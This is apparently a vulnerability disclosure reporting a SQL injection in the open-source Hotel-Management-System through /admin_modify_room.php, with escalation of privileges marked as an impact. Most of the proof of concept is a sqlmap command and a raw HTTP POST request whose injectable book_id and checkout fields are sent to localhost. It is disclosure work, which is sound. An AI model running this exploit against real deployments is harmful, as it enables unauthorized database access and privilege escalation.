[description]
Hotel-Management-System was discovered to contain a SQL Injection vulnerability via the URI /admin_modify_room.php.
[Vulnerability Type]
SQL Injection
[Vendor of Product]
Hotel-Management-System,https://github.com/vaibhavverma9999/Hotel-Management-System
[Affected Product Code Base]
commit<=91caab8e505a1791780594d23408fb31fcc272cc
[Impact Escalation of Privileges]
true
[POC] sqlmap commands:
python sqlmap.py -r C:\Users\Administrator\Desktop\1.txt --batch --banner --flush-session
1.txt
POST /admin_modify_room.php HTTP/1.1
Host: localhost
Content-Length: 29
Cache-Control: max-age=0
sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/confirmed_bookings.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=n99guqnac6hiqno7i7nacd2mnm
Connection: keep-alive
book_id=1&checkout=2024-07-20
